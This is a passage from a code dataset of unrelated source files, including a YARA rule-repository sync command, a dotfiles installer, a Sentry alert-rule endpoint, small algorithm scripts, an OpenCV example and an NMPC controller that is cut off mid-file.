else:\n # GIT UPDATE\n try:\n repo = Repo(repo_local)\n origin = repo.remotes.origin\n current_hash = repo.head.object.hexsha\n head_name = [x.name for x in repo.heads][0]\n origin.fetch()\n changed = origin.refs[head_name].object.hexsha != current_hash\n if changed:\n diff = repo.head.commit.diff(origin.refs[head_name].object.hexsha)\n origin.pull()\n for cht in diff.change_type:\n changes = list(diff.iter_change_type(cht))\n if len(changes) == 0:\n continue\n\n # if file deleted, remove rule\n if cht in (\"D\"):\n for change in changes:\n if (\n Path(change.b_path).suffix.lower()\n in settings.YARA_EXT\n ):\n rule = Rule.objects.get(\n path=\"{}/{}\".format(repo_local, change.a_path)\n )\n rule.delete()\n self.stdout.write(\n self.style.ERROR(\n \"\\tRule {} has been deleted\".format(\n change.b_path\n )\n )\n )\n\n # if changed update [rename generate also a M event]\n elif cht in (\"M\"):\n for change in changes:\n if (\n Path(change.b_path).suffix.lower()\n in settings.YARA_EXT\n ):\n old_path = \"{}/{}\".format(repo_local, change.a_path)\n new_path = \"{}/{}\".format(repo_local, change.b_path)\n rule = Rule.objects.get(path=old_path)\n rule.path = new_path\n rule.save()\n self.stdout.write(\n self.style.ERROR(\n \"\\tRule {} has been updated\".format(\n old_path\n )\n )\n )\n\n # if new add to test list\n elif cht in (\"A\", \"C\"):\n for 
change in changes:\n if (\n Path(change.b_path).suffix.lower()\n in settings.YARA_EXT\n ):\n path = \"{}/{}\".format(repo_local, change.b_path)\n self.updated_rules.append((path, ruleset.pk))\n\n self.stdout.write(\"\\tRepo {} pulled\".format(ruleset.url))\n except (git.exc.GitCommandError, git.exc.NoSuchPathError) as e:\n self.stdout.write(self.style.ERROR(\"\\tERROR: {}\".format(e)))\n ruleset.enabled = False\n ruleset.save()\n\n def parse_awesome(self):\n \"\"\"\n Sync rulesets list from awesome-yara rule\n \"\"\"\n r = requests.get(settings.AWESOME_PATH)\n soup = BeautifulSoup(marko.convert(r.text), features=\"html.parser\")\n rulesets_a = soup.h2.nextSibling.nextSibling.find_all(\"a\")\n rulesets = []\n for ruleset in rulesets_a:\n link = ruleset[\"href\"].split(\"/tree/\")[0]\n name = ruleset.contents[0]\n try:\n description = BeautifulSoup(\n ruleset.nextSibling.li.text, \"html.parser\"\n ).text\n except AttributeError:\n try:\n description = BeautifulSoup(\n ruleset.nextSibling.nextSibling.li.text, \"html.parser\"\n ).text\n except AttributeError:\n description = None\n if link.startswith(\"https://github.com/\"):\n rulesets.append((link, name, description))\n\n # UPDATE MANUAL ADDED REPO\n other_rulesets = Ruleset.objects.filter(\n user__isnull=True, enabled=True\n ).exclude(url__in=[x[0] for x in rulesets])\n for ruleset in other_rulesets:\n rulesets.append((ruleset.url, ruleset.name, ruleset.description))\n\n self.stdout.write(self.style.SUCCESS(\"Found {} repo\".format(len(rulesets))))\n\n with transaction.atomic():\n pool = ThreadPool(settings.THREAD_NO)\n _ = pool.map(self.down_repo, rulesets)\n pool.close()\n\n self.stdout.write(\"DONE\")\n\n def add_yara(self):\n \"\"\"\n Get all yara rules in rulesets\n \"\"\"\n self.stdout.write(self.style.SUCCESS(\"Updating Rules\"))\n self.stdout.write(\"\\t{} rules to test!\".format(len(self.updated_rules)))\n with transaction.atomic():\n pool = ThreadPool(settings.THREAD_NO)\n _ = pool.map(self.compile_rule, self.updated_rules)\n pool.close()\n self.stdout.write(\"DONE\")\n\n def custom_rulesets(self):\n \"\"\"\n ADD CUSTOM RULESET TO ALL OLD USERS\n \"\"\"\n for user in get_user_model().objects.all():\n _, created = Ruleset.objects.get_or_create(\n user=user,\n name=\"{}-Ruleset\".format(user.username),\n description=\"Your crafted ruleset\",\n )\n if created:\n self.stdout.write(\n self.style.SUCCESS(\"Ruleset added to {}!\".format(user))\n )\n\n def handle(self, *args, **kwargs):\n self.parse_awesome()\n self.add_yara()\n self.custom_rulesets()\n self.stdout.write(self.style.SUCCESS(\"Operation completed\"))\n","sub_path":"orochi/ya/management/commands/rules_sync.py","file_name":"rules_sync.py","file_ext":"py","file_size_in_byte":8976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
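The sync command above decides whether a rule file is usable by first trying to load it as precompiled rules and only then compiling the plain-text source. A condensed sketch of that fallback, assuming the yara-python package; the rule path is a hypothetical placeholder:

```python
import yara

def rule_is_usable(path):
    # Precompiled rulesets load directly; plain-text sources must compile.
    try:
        yara.load(str(path))
        return True
    except yara.Error:
        try:
            yara.compile(str(path), includes=False)
            return True
        except yara.SyntaxError:
            return False

print(rule_is_usable("rules/example.yar"))  # hypothetical path
```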
+{"seq_id":"557440955","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport subprocess\nimport os\n\nDOTFILES_DIR = os.path.expanduser('~/dotfiles/')\n\nSYMLINKS = (\n ('.aliases', '~/.aliases'),\n # Zsh\n ('.zshrc', '~/.zshrc'),\n # Shell bits\n ('.path', '~/.path'),\n ('.inputrc', '~/.inputrc'),\n ('.hushlogin', '~/.hushlogin'),\n # Ag - silver searcher.\n ('.agignore', '~/.agignore'),\n # Git\n ('.gitconfig', '~/.gitconfig'),\n ('.gitignore_', '~/.gitignore'),\n ('.git_commit_msg.txt', '~/.git_commit_msg.txt'),\n)\n\n\nPOST_COMMANDS = (\n # Install zgen\n 'git clone https://github.com/tarjoilija/zgen.git \"${HOME}/.zgen\"',\n)\n\n\ndef underline(title):\n \"\"\" Underlines a string \"\"\"\n return \"{0}\\n{1}\\n\".format(title, len(title) * '=')\n\n\ndef install_dotfiles():\n print(underline('Creating symlinks'))\n for orig_loc, symlink in SYMLINKS:\n symlink = os.path.expanduser(symlink)\n symlink_dir = os.path.dirname(symlink)\n if not os.path.exists(symlink_dir):\n os.makedirs(symlink_dir)\n orig_loc = '{}{}'.format(DOTFILES_DIR, orig_loc)\n create_symlink(orig_loc, symlink)\n print (\"\")\n\n\ndef create_symlink(orig_loc, symlink):\n print('Symlink: {}'.format(symlink))\n if os.path.exists(symlink):\n print('✘ Failed: path exists.')\n return\n os.symlink(orig_loc, symlink)\n print ('✔ Created.')\n\n\ndef run_post_install_commands():\n print(underline('Running install commands'))\n for command in POST_COMMANDS:\n print('Running: {}'.format(command))\n subprocess.call(command, shell=True)\n return\n\n\nif __name__ == \"__main__\":\n print('')\n install_dotfiles()\n run_post_install_commands()\n print('\\nDone!')\n","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"256384394","text":"num=11\nsum=0 \ncount=0 \nL=[]\nx=\" \"\nwhile num>0:\n rem=num%2\n L.append(rem)\n num=num//2\n count=count+1\n \nfor i in range(len(L)-1, -1, -1):\n x=x+str(L[i])\nprint(int(x))\n","sub_path":"Basics/Looping/Relevant_Programs/Decimal-to-Binary.py","file_name":"Decimal-to-Binary.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"19604668","text":"from rest_framework import status\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\n\nfrom sentry import audit_log\nfrom sentry.api.base import region_silo_endpoint\nfrom sentry.api.bases.rule import RuleEndpoint\nfrom sentry.api.serializers import serialize\nfrom sentry.api.serializers.models.rule import RuleSerializer\nfrom sentry.api.serializers.rest_framework.rule import RuleSerializer as DrfRuleSerializer\nfrom sentry.integrations.slack.utils import RedisRuleStatus\nfrom sentry.mediators import project_rules\nfrom sentry.models import (\n RuleActivity,\n RuleActivityType,\n RuleStatus,\n SentryAppComponent,\n SentryAppInstallation,\n Team,\n User,\n)\nfrom sentry.rules.actions import trigger_sentry_app_action_creators_for_issues\nfrom sentry.signals import alert_rule_edited\nfrom sentry.tasks.integrations.slack import find_channel_id_for_rule\nfrom sentry.utils import metrics\nfrom sentry.web.decorators import transaction_start\n\n\n@region_silo_endpoint\nclass ProjectRuleDetailsEndpoint(RuleEndpoint):\n @transaction_start(\"ProjectRuleDetailsEndpoint\")\n def get(self, request: Request, project, rule) -> Response:\n \"\"\"\n Retrieve a rule\n\n Return details on an individual rule.\n\n {method} {path}\n\n \"\"\"\n\n # Serialize Rule object\n serialized_rule = serialize(\n rule, request.user, RuleSerializer(request.GET.getlist(\"expand\", []))\n )\n\n errors = []\n # Prepare Rule Actions that are SentryApp components using the meta fields\n for action in serialized_rule.get(\"actions\", []):\n if action.get(\"_sentry_app_installation\") and action.get(\"_sentry_app_component\"):\n installation = SentryAppInstallation(**action.get(\"_sentry_app_installation\", {}))\n component = installation.prepare_ui_component(\n SentryAppComponent(**action.get(\"_sentry_app_component\")),\n project,\n action.get(\"settings\"),\n )\n if component is None:\n errors.append(\n {\"detail\": f\"Could not fetch details from {installation.sentry_app.name}\"}\n )\n action[\"disabled\"] = True\n continue\n\n action[\"formFields\"] = component.schema.get(\"settings\", {})\n\n # Delete meta fields\n del action[\"_sentry_app_installation\"]\n del action[\"_sentry_app_component\"]\n\n # TODO(nisanthan): This is a temporary fix. 
We need to save both the label and value of the selected choice and not save all the choices.\n if action.get(\"id\") == \"sentry.integrations.jira.notify_action.JiraCreateTicketAction\":\n for field in action.get(\"dynamic_form_fields\", []):\n if field.get(\"choices\"):\n field[\"choices\"] = [\n p\n for p in field.get(\"choices\", [])\n if isinstance(p[0], str) and isinstance(p[1], str)\n ]\n\n if len(errors):\n serialized_rule[\"errors\"] = errors\n\n return Response(serialized_rule)\n\n @transaction_start(\"ProjectRuleDetailsEndpoint\")\n def put(self, request: Request, project, rule) -> Response:\n \"\"\"\n Update a rule\n\n Update various attributes for the given rule.\n\n {method} {path}\n {{\n \"name\": \"My rule name\",\n \"conditions\": [],\n \"filters\": [],\n \"actions\": [],\n \"actionMatch\": \"all\",\n \"filterMatch\": \"all\"\n }}\n\n \"\"\"\n serializer = DrfRuleSerializer(\n context={\"project\": project, \"organization\": project.organization},\n data=request.data,\n partial=True,\n )\n\n if serializer.is_valid():\n data = serializer.validated_data\n\n # combine filters and conditions into one conditions criteria for the rule object\n conditions = data.get(\"conditions\", [])\n if \"filters\" in data:\n conditions.extend(data[\"filters\"])\n\n kwargs = {\n \"name\": data[\"name\"],\n \"environment\": data.get(\"environment\"),\n \"project\": project,\n \"action_match\": data[\"actionMatch\"],\n \"filter_match\": data.get(\"filterMatch\"),\n \"conditions\": conditions,\n \"actions\": data[\"actions\"],\n \"frequency\": data.get(\"frequency\"),\n }\n owner = data.get(\"owner\")\n if owner:\n try:\n kwargs[\"owner\"] = owner.resolve_to_actor().id\n except (User.DoesNotExist, Team.DoesNotExist):\n return Response(\n \"Could not resolve owner\",\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n if data.get(\"pending_save\"):\n client = RedisRuleStatus()\n kwargs.update({\"uuid\": client.uuid, \"rule_id\": rule.id})\n find_channel_id_for_rule.apply_async(kwargs=kwargs)\n\n context = {\"uuid\": client.uuid}\n return Response(context, status=202)\n\n trigger_sentry_app_action_creators_for_issues(kwargs.get(\"actions\"))\n\n if rule.data[\"conditions\"] != kwargs[\"conditions\"]:\n metrics.incr(\"sentry.issue_alert.conditions.edited\", sample_rate=1.0)\n updated_rule = project_rules.Updater.run(rule=rule, request=request, **kwargs)\n\n RuleActivity.objects.create(\n rule=updated_rule, user=request.user, type=RuleActivityType.UPDATED.value\n )\n self.create_audit_entry(\n request=request,\n organization=project.organization,\n target_object=updated_rule.id,\n event=audit_log.get_event_id(\"RULE_EDIT\"),\n data=updated_rule.get_audit_log_data(),\n )\n alert_rule_edited.send_robust(\n user=request.user,\n project=project,\n rule=rule,\n rule_type=\"issue\",\n sender=self,\n is_api_token=request.auth is not None,\n )\n\n return Response(serialize(updated_rule, request.user))\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n @transaction_start(\"ProjectRuleDetailsEndpoint\")\n def delete(self, request: Request, project, rule) -> Response:\n \"\"\"\n Delete a rule\n \"\"\"\n rule.update(status=RuleStatus.PENDING_DELETION)\n RuleActivity.objects.create(\n rule=rule, user=request.user, type=RuleActivityType.DELETED.value\n )\n self.create_audit_entry(\n request=request,\n organization=project.organization,\n target_object=rule.id,\n event=audit_log.get_event_id(\"RULE_REMOVE\"),\n data=rule.get_audit_log_data(),\n )\n return 
Response(status=202)\n","sub_path":"src/sentry/api/endpoints/project_rule_details.py","file_name":"project_rule_details.py","file_ext":"py","file_size_in_byte":7186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"151132283","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/flanker/Developer/Github/DebTools/debtools/tests/tests_utils.py\n# Compiled at: 2015-07-27 09:11:29\nfrom __future__ import unicode_literals\nfrom unittest import TestCase\nimport pkg_resources\nfrom debtools.utils import get_control_data\n__author__ = b'Matthieu Gallet'\n\nclass TestGetControlData(TestCase):\n\n @property\n def filename(self):\n return pkg_resources.resource_filename(b'debtools.tests', b'python-debtools_0.3-1_all.deb')\n\n def test_get_control_data(self):\n data = get_control_data(self.filename)\n self.assertEqual({b'Maintainer': b'Matthieu Gallet ', \n b'Description': b'Utilities for creating mutliple Debian packages.\\nDebTools\\n========', \n b'Package': b'python-debtools', \n b'Section': b'python', \n b'Depends': b'python (>= 2.7), python (<< 2.8), python-stdeb, python-backports.lzma', \n b'Priority': b'optional', \n b'Source': b'debtools', \n b'Installed-Size': b'88', \n b'Version': b'0.3-1', \n b'Architecture': b'all'}, data)","sub_path":"pycfiles/debtools-0.7.4.tar/tests_utils.py","file_name":"tests_utils.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"559046416","text":"# topics = [\"数组\"]\n\nfrom typing import List\n\n\nclass Solution:\n def nextPermutation(self, nums: List[int]) -> None:\n \"\"\"\n 两次遍历\n time O(n), space O(1), n 为数组长度\n \"\"\"\n n = len(nums)\n has_next = False\n\n # 从后往前遍历,找到第一个 i, 存在 nums[i] < nums[j], j 在 [i + 1, n - 1] 区间,且尽量靠右(即尽量小)\n i = n - 1\n while i >= 0:\n j = n - 1\n while j > i:\n if nums[j] > nums[i]:\n has_next = True\n break\n j -= 1\n if has_next is True:\n nums[i], nums[j] = nums[j], nums[i]\n break\n i -= 1\n\n # 反转 [start, end]\n start = i + 1\n end = n - 1\n while start < end:\n nums[start], nums[end] = nums[end], nums[start]\n start += 1\n end -= 1\n","sub_path":"algorithms/[31]下一个排列/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"539412715","text":"import cv2\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndef main():\r\n \r\n source = \"C:\\\\Users\\\\Srikanth\\\\Desktop\\\\Python\\\\Opencv\\\\Dataset\\\\\"\r\n \r\n imgpath1 = source + \"4.2.01.tiff\"\r\n \r\n img = cv2.imread(imgpath1,1)\r\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\r\n \r\n rows, columns, channels = img.shape\r\n \r\n T = np.float32([[1,0,-50],[0,1,-50]])\r\n \r\n print(T)\r\n \r\n output = cv2.warpAffine(img,T, (columns,rows))\r\n \r\n plt.imshow(output)\r\n plt.title(\"Shifted image\")\r\n plt.show()\r\n \r\nif __name__ == '__main__':\r\n main()","sub_path":"Transformations using Opencv2/6.Shifting an image1.py","file_name":"6.Shifting an image1.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"99357848","text":"import time\nimport os\nimport numpy as np\nimport osqp\nfrom scipy import sparse\nimport importlib\nfrom numba import njit\n\nfrom core.controllers.controller import Controller\nfrom koopman_core.dynamics import BilinearLiftedDynamics\n\n\n@njit(fastmath=True, cache=True)\ndef _update_objective(C_obj, Q, QN, R, R0, xr, z_init, u_init, const_offset, u_prev, N, nx, nu):\n \"\"\"\n Construct MPC objective function\n :return:\n \"\"\"\n res = np.hstack(\n ((C_obj.T @ Q @ (C_obj @ z_init[:, :-1] - xr[:, :-1])).T.flatten(),\n C_obj.T @ QN @ (C_obj @ z_init[:, -1] - xr[:, -1]),\n (R @ (u_init + const_offset)).T.flatten()))\n\n # Jitter regularization linear objective:\n res[(N+1)*nx:(N+1)*nx + nu] -= R0 @ u_prev\n return res\n\n@njit(fastmath=True, cache=True)\ndef _update_constraint_vecs(osqp_l, osqp_u, z, z_init, x_init_flat, xr, xmin_tiled, xmax_tiled,\n u_init_flat, umin_tiled, umax_tiled, r_vec, nx, ns, N, n_opt_x, n_opt_x_u, terminal_constraint):\n # Equality constraints:\n osqp_l[:nx] = -(z - z_init[0, :])\n osqp_l[nx:nx * (N + 1)] = -r_vec\n\n osqp_u[:nx * (N + 1)] = osqp_l[:nx * (N + 1)]\n\n # Input constraints:\n osqp_l[n_opt_x:n_opt_x_u] = umin_tiled - u_init_flat\n osqp_u[n_opt_x:n_opt_x_u] = umax_tiled - u_init_flat\n\n # State constraints:\n osqp_l[n_opt_x_u:] = xmin_tiled - x_init_flat\n osqp_u[n_opt_x_u:] = xmax_tiled - x_init_flat\n\n if terminal_constraint:\n osqp_l[-ns:] = xr - x_init_flat[-ns:]\n osqp_u[-ns:] = osqp_l[-ns:]\n\n return osqp_l, osqp_u\n\n@njit(fastmath=True, cache=True)\ndef _update_current_sol(z_init, dz_flat, u_init, du_flat, u_init_flat, nx, nu, N):\n cur_z = z_init + dz_flat.reshape(N + 1, nx).T\n cur_u = u_init + du_flat.reshape(N, nu).T\n u_init_flat = u_init_flat + du_flat\n\n return cur_z, cur_u, u_init_flat\n\nclass NMPCTrajControllerNb(Controller):\n \"\"\"\n Class for nonlinear MPC with control-affine dynamics.\n\n Quadratic programs are solved using OSQP.\n \"\"\"\n\n def __init__(self, dynamics, N, dt, umin, umax, xmin, xmax, C_x, C_obj, Q, R, QN, R0, xr, solver_settings, const_offset=None,\n terminal_constraint=False, add_slack=False, q_slack=1e3):\n \"\"\"\n Initialize the nonlinear mpc class.\n :param dynamics: (AffindeDynamics) dynamics object describing system dynamics\n :param N: (int) Prediction horizon in number of timesteps\n :param dt: (float) Time interval between time steps\n :param umin: (np.array) Actuation lower bounds\n :param umax: (np.array) Actuation upper bounds\n :param xmin: (np.array) State lower bounds\n :param xmax: (np.array) State upper bounds\n :param Q: (sparse.csc_matrix) State deviation penalty matrix\n :param R: (sparse.csc_matrix) Actuation penalty matrix\n :param QN: (sparse.csc_matrix) Terminal state deviation penalty matrix\n :param xr: (np.array) Desired state, setpoint\n :param const_offset: (np.array) Constant offset of the control inputs\n :param terminal_constraint: (boolean) Constrain terminal state to be xr\n :param add_slack: (boolean) Add slack variables to state constraints\n :param q_slack: (float) Penalty value of slack terms q||s||^2, where s are the slack variables\n \"\"\"\n\n Controller.__init__(self, dynamics)\n\n self.dynamics_object = dynamics\n self.nx = self.dynamics_object.n\n self.nu = self.dynamics_object.m\n self.dt = dt\n self.C_x = C_x\n self.C_obj = C_obj\n if not type(self.dynamics_object) == BilinearLiftedDynamics:\n self.dynamics_object.lift = lambda x, t: x\n\n self.Q = Q\n self.QN = QN\n self.R = R\n self.R0 = R0\n self.N = N\n self.xmin = 
np.array(xmin)\n self.xmax = np.array(xmax)\n self.umin = np.array(umin)\n self.umax = np.array(umax)\n\n if self.dynamics_object.standardizer_u is not None:\n self.const_offset = self.dynamics_object.standardizer_u.mean_.reshape(-1, 1)\n self.umin = self.dynamics_object.standardizer_u.transform(self.umin.reshape(1,-1)).squeeze()\n self.umax = self.dynamics_object.standardizer_u.transform(self.umax.reshape(1,-1)).squeeze()\n elif const_offset is None:\n self.const_offset = np.zeros((self.nu, 1))\n else:\n self.const_offset = const_offset\n\n self.xr = xr\n self.ns = self.C_x.shape[0]\n if self.xr.ndim==2:\n # Add copies of the final state in the desired trajectory to enable prediction beyond trajectory horizon:\n if self.xr.shape[0] == self.ns:\n xr_tail = np.vstack((np.tile(self.xr[:int(self.ns/2), -1], (self.N + 1, 1)).T, np.zeros((int(self.ns/2), self.N+1))))\n else:\n xr_tail = np.tile(self.xr[:, -1], (self.N + 1, 1)).T\n self.xr = np.hstack((self.xr, xr_tail))\n self.terminal_constraint = terminal_constraint\n\n self.add_slack = add_slack\n self.Q_slack = q_slack * sparse.eye(self.ns * (self.N))\n\n self.solver_settings = solver_settings\n self.embed_pkg_str = 'nmpc_' + str(self.nx) + '_' + str(self.nu) + '_' + str(self.N)\n\n self.prep_time = []\n self.qp_time = []\n self.comp_time = []\n self.x_iter = []\n self.u_iter = []\n\n self.sub_traj = []\n\n # Define dense copies of problem matrices for numba implementation:\n self.C_x_dense = self.C_x.toarray().astype(float)\n self.C_obj_dense = self.C_obj.toarray().astype(float)\n self.Q_dense = self.Q.toarray()\n self.QN_dense = self.QN.toarray()\n self.R_dense = self.R.toarray()\n self.R0_dense = self.R0.toarray()\n self.const_offset_dense = np.tile(self.const_offset, (1, self.N))\n\n def construct_controller(self, z_init, u_init):\n \"\"\"\n Construct NMPC controller.\n :param z_init: (np.array) Initial guess of z-solution\n :param u_init: (np.array) Initial guess of u-solution\n :return:\n \"\"\"\n\n z0 = z_init[:, 0]\n self.z_init = z_init\n self.u_init = u_init\n self.cur_z = z_init\n self.cur_u = u_init\n self.x_init = self.C_x_dense @ z_init\n self.u_init_flat = self.u_init.flatten(order='F')\n self.x_init_flat = self.x_init.flatten(order='F')\n self.dz_flat = self.z_init.flatten(order='F')\n self.du_flat = self.u_init.flatten(order='F')\n\n #self.warm_start = np.zeros(self.nx*(self.N+1) + self.nu*self.N)\n\n A_lst = [np.ones((self.nx, self.nx)) for _ in range(self.N)]\n B_lst = [np.ones((self.nx, self.nu)) for _ in range(self.N)]\n self.A_stacked = np.hstack(A_lst).flatten(order='F')\n self.B_stacked = np.hstack(B_lst).flatten(order='F')\n self.r_vec = np.array([np.ones(self.nx) for _ in range(self.N)]).flatten()\n\n self.construct_objective_()\n self.construct_constraint_vecs_(z0, None)\n self.construct_constraint_matrix_(A_lst, B_lst)\n self.construct_constraint_matrix_data_(A_lst, B_lst)\n\n # Create an OSQP object and setup workspace\n self.prob = osqp.OSQP()\n self.prob.setup(P=self._osqp_P, q=self._osqp_q, A=self._osqp_A, l=self._osqp_l, u=self._osqp_u, verbose=False,\n max_iter=self.solver_settings['max_iter'],\n warm_start=self.solver_settings['warm_start'],\n polish=self.solver_settings['polish'],\n polish_refine_iter=self.solver_settings['polish_refine_iter'],\n check_termination=self.solver_settings['check_termination'],\n eps_abs=self.solver_settings['eps_abs'],\n eps_rel=self.solver_settings['eps_rel'],\n eps_prim_inf=self.solver_settings['eps_prim_inf'],\n eps_dual_inf=self.solver_settings['eps_dual_inf'],\n 
linsys_solver=self.solver_settings['linsys_solver'],\n adaptive_rho=self.solver_settings['adaptive_rho'])\n\n if self.solver_settings['gen_embedded_ctrl']:\n self.construct_embedded_controller()\n\n def update_solver_settings(self, solver_settings):\n \"\"\"\n Update the OSQP solver settings (see OSQP documentation for detailed description of each setting)\n :param warm_start: (boolean) Warm start the solver with solution from previous timestep\n :param check_termination: (int) Frequency of checking whether the solution has converged (number of iterations)\n :param max_iter: (int) Maximum iterations allowed by the solver\n :param polish: (boolean) Execute polish step at the end of solve\n :param linsys_solver: (string) Which linear system solver to use as part of OSQP algorithm\n :return:\n \"\"\"\n self.solver_settings = solver_settings\n self.prob.update_settings(warm_start=self.solver_settings['warm_start'],\n polish=self.solver_settings['polish'],\n polish_refine_iter=self.solver_settings['polish_refine_iter'],\n check_termination=self.solver_settings['check_termination'],\n eps_abs=self.solver_settings['eps_abs'],\n eps_rel=self.solver_settings['eps_rel'],\n eps_prim_inf=self.solver_settings['eps_prim_inf'],\n eps_dual_inf=self.solver_settings['eps_dual_inf'],\n linsys_solver=self.solver_settings['linsys_solver'])\n\n def solve_to_convergence(self, z, t, z_init_0, u_init_0, eps=1e-3, max_iter=1, min_iter=10):\n \"\"\"\n Run SQP-algorithm to convergence\n :param z: (np.array) Initial value of z\n :param t: (float) Initial value of t (for time-dependent dynamics)\n :param z_init_0: (np.array) Initial guess of z-solution\n :param u_init_0: (np.array) Initial guess of u-solution\n :param eps: (float) Stop criterion, normed difference of the control input sequence\n :param max_iter: (int) Maximum SQP-iterations to run\n :return:\n \"\"\"\n iter = 0\n self.cur_z = z_init_0\n self.cur_u = u_init_0\n u_prev = np.zeros_like(u_init_0)\n\n from matplotlib import pyplot as plt\n plt.figure()\n while (iter < min_iter or np.linalg.norm(u_prev - self.cur_u) / np.linalg.norm(u_prev) > eps) and iter < max_iter:\n t0 = time.time()\n u_prev = self.cur_u.copy()\n self.z_init = self.cur_z.copy()\n self.x_init = (self.C_x_dense @ self.z_init)\n self.u_init = self.cur_u.copy()\n\n # Update equality constraint matrices:\n #A_lst, B_lst = self.update_linearization_()\n self.update_linearization_()\n\n # Solve MPC Instance\n self.update_objective_(t)\n self.construct_constraint_vecs_(z, None)\n #self.update_constraint_matrix_data_(A_lst, B_lst)\n self.update_constraint_matrix_data_()\n t_prep = time.time() - t0\n\n self.solve_mpc_()\n dz = self.dz_flat.reshape(self.nx, self.N + 1, order='F')\n du = self.du_flat.reshape(self.nu, self.N, order='F')\n\n #alpha = min(1., iter/min_iter + 1/min_iter)\n alpha = 1.\n #print(alpha)\n self.cur_z = self.z_init + alpha * dz\n self.cur_u = self.u_init + alpha * du\n self.u_init_flat = self.u_init_flat + alpha * self.du_flat\n\n #plt.plot(self.cur_z[0, :], self.cur_z[2,:], label=str(iter))\n #plt.show()\n iter += 1\n self.comp_time.append(time.time() - t0)\n self.prep_time.append(t_prep)\n self.qp_time.append(self.comp_time[-1] - t_prep)\n self.x_iter.append(self.cur_z.copy().T)\n self.u_iter.append(self.cur_u.copy().T)\n\n #print(iter, alpha, np.linalg.norm(u_prev - self.cur_u) / np.linalg.norm(u_prev))\n\n def eval(self, x, t):\n \"\"\"\n Run single iteration of SQP-algorithm to get control signal in closed-loop control\n :param x: (np.array) Current state\n :param t: 
(float) Current time (for time-dependent dynamics)\n :return: u: (np.array) Current control input\n \"\"\"\n t0 = time.time()\n z = self.dynamics_object.lift(x.reshape((1, -1)), None).squeeze()\n self.update_constraint_vecs_(z, t)\n\n self.solve_mpc_()\n self.cur_z, self.cur_u, self.u_init_flat = _update_current_sol(self.z_init, self.dz_flat, self.u_init,\n self.du_flat, self.u_init_flat, self.nx, self.nu,\n self.N)\n self.comp_time.append(time.time() - t0)\n\n if self.dynamics_object.standardizer_u is None:\n return self.cur_u[:, 0]\n else:\n return self.dynamics_object.standardizer_u.inverse_transform(self.cur_u[:, 0])\n\n def prepare_eval(self, t, update_initial_guess=True):\n t0 = time.time()\n if update_initial_guess:\n self.update_initial_guess_()\n self.update_objective_(t)\n self.update_linearization_()\n self.update_constraint_matrix_data_()\n #self.prob.warm_start(x=self.warm_start)\n self.prep_time.append(time.time() - t0)\n\n def construct_objective_(self):\n \"\"\"\n Construct MPC objective function\n :return:\n \"\"\"\n # Quadratic objective:\n if not self.add_slack:\n self._osqp_P = sparse.block_diag([sparse.kron(sparse.eye(self.N), self.C_obj.T @ self.Q @ self.C_obj),\n self.C_obj.T @ self.QN @ self.C_obj,\n sparse.kron(sparse.eye(self.N), self.R)], format='csc')\n\n else:\n self._osqp_P = sparse.block_diag([sparse.kron(sparse.eye(self.N), self.C_obj.T @ self.Q @ self.C_obj),\n self.C_obj.T @ self.QN @ self.C_obj,\n sparse.kron(sparse.eye(self.N), self.R),\n self.Q_slack], format='csc')\n\n # Jitter regularization quadratic objective:\n ind_start_control = (self.N+1)*self.nx\n self._osqp_P[ind_start_control:ind_start_control+self.nu, ind_start_control:ind_start_control+self.nu] += 0.5*self.R0\n\n # Linear objective:\n if self.xr.ndim==2:\n xr = self.xr[:,:self.N + 1]\n else:\n xr = self.xr.reshape(-1, 1)\n\n if not self.add_slack:\n self._osqp_q = np.hstack(\n [(self.C_obj.T @ self.Q @ (self.C_obj @ self.z_init[:, :-1] - xr[:, :-1])).flatten(order='F'),\n self.C_obj.T @ self.QN @ (self.C_obj @ self.z_init[:, -1] - xr[:, -1]),\n (self.R @ (self.u_init + self.const_offset)).flatten(order='F')])\n\n else:\n self._osqp_q = np.hstack(\n [(self.C_obj.T @ self.Q @ (self.C_obj @ self.z_init[:, :-1] - xr[:, :-1])).flatten(order='F'),\n self.C_obj.T @ self.QN @ (self.C_obj @ self.z_init[:, -1] - xr[:, -1]),\n (self.R @ (self.u_init + self.const_offset)).flatten(order='F'),\n np.zeros(self.ns * (self.N))])\n\n # Jitter regularization linear objective:\n self._osqp_q[ind_start_control:ind_start_control+self.nu] -= self.R0 @ self.cur_u[:, 0]\n\n def update_objective_(self, t):\n \"\"\"\n Construct MPC objective function\n :return:\n \"\"\"\n tindex = int(t/self.dt)\n xr = self.xr[:, tindex:tindex+self.N+1]\n\n self._osqp_q[:self.nx * (self.N + 1) + self.nu * self.N] = \\\n _update_objective(self.C_obj_dense, self.Q_dense, self.QN_dense, self.R_dense, self.R0_dense, xr, self.z_init, self.u_init,\n self.const_offset_dense, self.cur_u[:, 0], self.N, self.nx, self.nu)\n\n def construct_constraint_matrix_(self, A_lst, B_lst):\n \"\"\"\n Construct MPC constraint matrix\n :param A_lst: (list(np.array)) List of dynamics matrices, A, for each timestep in the prediction horizon\n :param B_lst: (list(np.array)) List of dynamics matrices, B, for each timestep in the prediction horizon\n :return:\n \"\"\"\n\n # Linear dynamics constraints:\n A_dyn = 